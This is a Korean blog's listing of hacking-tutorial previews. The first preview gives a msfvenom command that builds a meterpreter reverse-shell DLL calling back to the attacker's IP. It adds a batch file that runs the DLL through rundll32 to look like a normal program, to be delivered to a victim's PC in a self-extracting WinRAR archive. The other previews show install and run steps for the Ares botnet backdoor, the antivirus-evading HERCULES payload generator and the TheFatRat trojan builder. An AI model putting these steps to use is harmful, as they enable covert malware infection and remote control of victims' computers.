본문 바로가기

2. 시스템 해킹 및 모의 해킹43

winrar sfx를 활용한 압축파일 자동 dll인젝션 sfx 기능은 winrar 압축 파일을 더블클릭만 해도 압축이 자동으로 풀리는 기능입니다. 1> msfvenom -p windows/meterpreter/reverse_tcp lhost=[해커아이피] lport=[리스닝 포트번호] -f dll > virus.dll 위 명령어로 dll 바이러스를 생성해 줍니다. 2. 그 뒤 배치파일을 하나 만들기 위해 leafpad를 열어줍니다. @echo off echo [*]Processing Plz wait.. rundll32.exe virus.dll,main -> virus.dll을 rundll32라는 프로그램처럼 보이게 돌리는것 exit 위 구문들을 넣어주고 virus.bat 파일로 저장해줍니다. 그 후 두 파일을 피해자 윈도우로 옮겨줍니다. 3.두 파일을 같이 .. 2023. 12. 27.
감염 pc를 좀비pc(botnet)로 만드는 도구 ares https://github.com/sweetsoftware/Ares GitHub - sweetsoftware/Ares: Python botnet and backdoor Python botnet and backdoor. Contribute to sweetsoftware/Ares development by creating an account on GitHub. github.com git clone으로 다운받아줍니다. [설치법] >pip install -r requirements.txt >cd server >./ares.py initdb (윈도우 에이전트 사용시) ./wine_setup.sh ​ [사용법] 서버 : ./ares.py runserver -h 0.0.0.0 -p 8080 --threaded -h .. 2023. 12. 27.
자동 악성코드 제작 툴 Hercules https://github.com/EgeBalci/HERCULES GitHub - EgeBalci/HERCULES: HERCULES is a special payload generator that can bypass antivirus softwares. HERCULES is a special payload generator that can bypass antivirus softwares. - GitHub - EgeBalci/HERCULES: HERCULES is a special payload generator that can bypass antivirus softwares. github.com 백신을 우회하는 payload generator입니다. [설치법] git clone https://github.. 2023. 12. 27.
FATRAT - 파일을 트로이목마로 변경하기 https://github.com/Screetsec/TheFatRat GitHub - screetsec/TheFatRat: Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploit Thefatrat a massive exploiting tool : Easy tool to generate backdoor and easy tool to post exploitation attack like browser attack and etc . This tool compiles a malware with popular payload and th... github.com [설치법] git clone 으로.. 2023. 12. 27.